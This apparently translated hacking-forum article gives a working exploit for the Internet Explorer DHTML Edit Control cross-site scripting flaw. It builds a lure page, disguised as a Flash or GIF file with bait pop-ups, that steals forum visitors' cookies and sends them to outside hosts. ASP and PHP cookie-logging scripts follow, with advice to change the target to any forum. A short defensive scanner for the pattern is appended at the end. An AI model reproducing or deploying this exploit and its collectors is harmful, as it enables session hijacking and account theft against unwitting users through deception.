MSIE DHTML Edit Cross-site Scripting Vulnerability Research

Source: Internet
Author: User
Microsoft disclosed the MSIE DHTML Edit Control cross-site scripting vulnerability last year, but no working exploit has been published in our circles, which has left a lot of novices frustrated. Don't worry: isn't this a feast served up for everyone?!

[Affected Systems]
Microsoft Internet Explorer 6.0
- Microsoft Windows XP Professional SP1
- Microsoft Windows XP Professional
- Microsoft Windows XP Home SP1
- Microsoft Windows XP Home
- Microsoft Windows ME
- Microsoft Windows 98 SE
- Microsoft Windows 98
- Microsoft Windows 2000

[Description of vulnerability]
The Microsoft Internet Explorer DHTML Edit Control incorrectly filters part of its data, which a remote attacker can exploit in a cross-site scripting attack to obtain sensitive information. The security issue is that the DHTML Edit control can be accessed from the parent window, including its script functions: the attacker injects JavaScript directly into the control using execScript, and when the target user opens a malicious link, the malicious script executes and leaks sensitive information.
It seems to affect only IE 6.0 and has no effect on Windows XP SP2, but for users who have not installed the XP SP2 patch, the exploit value is quite large.
Since I happen to be running Windows XP SP1, let's test it. Create a local HTML page with the following content:
<title>Testing</title>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>Loading, please wait...</b>\'');setTimeout('main()',1000)">
<!-- DHTML Edit control, addressed from the parent page as "x" -->
<object
id="x"
classid="clsid:2D360201-FFF5-11D1-8D03-00A0C959BC0A"
width="800"
height="600"
align="middle"
>
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
<script>
// Injected into the control: names its window and loads the forum page into it
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main()
{
// The parent page reaches into the control's script engine through x.DOM.Script
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
alert('Wait...');
// Runs in the control once the forum page has loaded there
x.DOM.Script.execScript('alert(document.cookie)');
}
</script>

</body>
Open it in IE, and if your system has this flaw, see what appears.
Oh, my cookie information for the Black Defense Forum popped up. However, this page is very inconvenient to use and its success rate is not high: if you click OK before the DHTML control has finished loading, no cookie information pops up.
If the first pop-up is clicked before the page has loaded, the attack fails, so the page is clearly not good enough. Let's extend and modify it so that it steals cookie information with a high success rate. Let's start now.
To allow more loading time, we first increase the delay parameter in setTimeout('main()',1000) to 10000, that is, 10 seconds, which is long enough. Although the page appears to be loading, the status bar is displayed as well, so we modify the status bar text by adding the following function:
function clock(){
var title="Loading, please wait...";
status=title;
}
To entice viewers to open the page, we rename it as a .swf file, which disguises the page as a Flash file. Add this to the page:
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="" height="600">
<param name="movie" value="/college/uploadpic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/uploadpic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="" quality="High"></object>
We also hide the DHTML control by setting its width and height properties to 0. To send the cookie, we add the following script:
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdarticleid=&fdtitle=&fdlink=&func=add&s1=%b7%a2%b1%ed%c6%c0%c2%db&fdcomments='+document.cookie)");
For convenience of testing, I sent the visitor's cookie information to a comment page on a site on the Internet. The final test page is:
<title>Testing</title>
<body onload="setTimeout('x.DOM.body.innerHTML=\'<b>Loading, please wait...</b>\'');clock();setTimeout('main()',10000)">
<!-- DHTML Edit control, hidden by setting width and height to 0 -->
<object
id="x"
classid="clsid:2D360201-FFF5-11D1-8D03-00A0C959BC0A"
width="0"
height="0"
align="middle"
>
<param name="ActivateApplets" value="1">
<param name="ActivateActiveXControls" value="1">
</object>
<script>
// Overwrites the status bar text
function clock(){
var title="Loading, please wait...";
status=title;
}


// Injected into the control: names its window and loads the forum page into it
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}
function main()
{
x.DOM.Script.execScript(shellscript.toString());
x.DOM.Script.setTimeout("shellscript()");
// The alerts keep the visitor busy while the forum page loads in the control
alert("Game name: Mysterious altar\n");
alert("The person who passes the test has superhuman observation!\n");
alert("Only 10 people all over the world can find it!\n");
alert("I believe you are one of these 10");
alert("Good luck...\n");
alert("Be sure to find the difference after clicking OK!!\n");
x.DOM.Script.execScript('alert(document.cookie)');
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdarticleid=&fdtitle=&fdlink=&func=add&s1=%b7%a2%b1%ed%c6%c0%c2%db&fdcomments='+document.cookie)");
}
</script>

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" id="obj1" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0" border="0" width="" height="600">
<param name="movie" value="/college/uploadpic/2006/8/27/2006827233410827.swf">
<param name="quality" value="High">
<embed src="/college/uploadpic/2006/8/27/2006827233410827.swf" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" name="obj1" width="489" height="" quality="High"></object>
</body>

The /college/uploadpic/2006/8/27/2006827233410827.swf in it is an address a friend sent me. It gave me a scare, but he did not expect me to use it to cheat some royalties out of it, hehe.
To test, quickly go to the Black Defense Forum and publish a post; it has to be attractive.
Is it attractive enough? I guess a lot of people will fall for it! In fact, we could rename the attack file above to .swf, but to upload it conveniently to the forum (which does not allow the SWF format), I renamed it to GIF format.
Because it exploits an IE vulnerability, this page can be hosted at any address, but note:
function shellscript()
{
window.name="poorchild";
open("http://www.hacker.com.cn/newbbs/announcements.asp?action=showone&boardid=0","poorchild");
}

This function defines which site's cookie information we steal from the visitor's machine. I set it to the Black Defense Forum; you can change it to the forum you want to attack. The page chosen here should have little content, preferably no pictures, to speed up loading.
OK, let's take a look at the effect first.

It seems to be a success. To keep viewers from seeing their own cookie information, you can send it to your own custom ASP page. In a space that supports ASP and the FSO component, create the following page:
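<%
' Append the value of the "cookie" request parameter to cookie.txt
testfile=Server.MapPath("cookie.txt")
cookie=Request("cookie")
Set fs=Server.CreateObject("Scripting.FileSystemObject")
' 8 = open for appending, True = create the file if it does not exist
Set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(cookie)
thisfile.Close
Set fs = Nothing
%>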
Name it cookie.asp, and remember to change the following:
x.DOM.Script.execScript("window.open('http://www.njrb.com.cn/comment/comment.php3?fdRealName=zhang&fdEmail=zhang@1.com&fdarticleid=&fdtitle=&fdlink=&func=add&s1=%b7%a2%b1%ed%c6%c0%c2%db&fdcomments='+document.cookie)");
to
x.DOM.Script.execScript("window.open('http://youwebsite.com/cookie.asp?cookie='+document.cookie)");
Or create the following page in a space that supports PHP:
<?php
// Append the raw query string to info.txt
$info = getenv("QUERY_STRING");
if ($info) {
$fp = fopen("info.txt","a");
fwrite($fp,$info."\n");
fclose($fp);
}

// Send the visitor on to another page
header("Location: http://wwwhacker.com.cn");
In this way, through this vulnerability, we can steal the cookie information of any forum. No matter how secure the forum is, as long as the visitor's IE has this vulnerability, you can successfully obtain someone else's cookies. This could be called the forum killer!
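A defender-side check for the page structure built above, as an added example that is not part of the original article: it scans HTML (for example forum uploads or pages captured at a proxy) for the DHTML Edit control's CLSID and for parent-page script that reaches into the control through <id>.DOM.Script. The function, class and field names and both sample pages are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID of the DHTML Edit control, taken from the article's test page.
DHTML_EDIT_CLSID = "clsid:2d360201-fff5-11d1-8d03-00a0c959bc0a"

class PageScanner(HTMLParser):
    """Collects DHTML Edit <object> tags and every piece of script on the page."""
    def __init__(self):
        super().__init__()
        self.controls, self.scripts, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "").strip() for k, v in attrs}
        if tag == "object" and a.get("classid", "").lower() == DHTML_EDIT_CLSID:
            hidden = a.get("width") == "0" and a.get("height") == "0"
            self.controls.append({"id": a.get("id", ""), "hidden": hidden})
        self._in_script = self._in_script or tag == "script"
        # Event-handler attributes such as onload carry script as well.
        self.scripts += [v for k, v in a.items() if k.startswith("on")]

    def handle_endtag(self, tag):
        self._in_script = self._in_script and tag != "script"

    def handle_data(self, data):
        if self._in_script:
            self.scripts.append(data)

def scan_page(html):
    """Return one finding per DHTML Edit control embedded in the page."""
    scanner = PageScanner()
    scanner.feed(html)
    scanner.close()
    code = "\n".join(scanner.scripts)
    findings = []
    for ctl in scanner.controls:
        # Parent page driving the control's script engine: <id>.DOM.Script.execScript(
        pattern = (r"\b%s\s*\.\s*DOM\s*\.\s*Script\s*\.\s*(execScript|setTimeout)\s*\("
                   % re.escape(ctl["id"]))
        injects = bool(ctl["id"]) and re.search(pattern, code, re.I) is not None
        findings.append({**ctl, "script_injection": injects,
                         "reads_cookie": injects and "document.cookie" in code.lower()})
    return findings

# Constructed sample inputs (not captured traffic).
SUSPICIOUS = """<body onload="setTimeout('main()',10000)">
<object id="x" classid="clsid:2D360201-FFF5-11D1-8D03-00A0C959BC0A" width="0" height="0"></object>
<script>function main(){ x.DOM.Script.execScript('alert(document.cookie)'); }</script></body>"""
EDITOR = """<object id="ed" classid="clsid:2D360201-FFF5-11D1-8D03-00A0C959BC0A" width="800" height="600"></object>
<script>function load(){ ed.DOM.body.innerHTML = 'draft text'; }</script>"""
```

scan_page(SUSPICIOUS) reports a hidden control with script injection and a cookie read, while scan_page(EDITOR), a page that only uses the control as an editor, reports neither.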
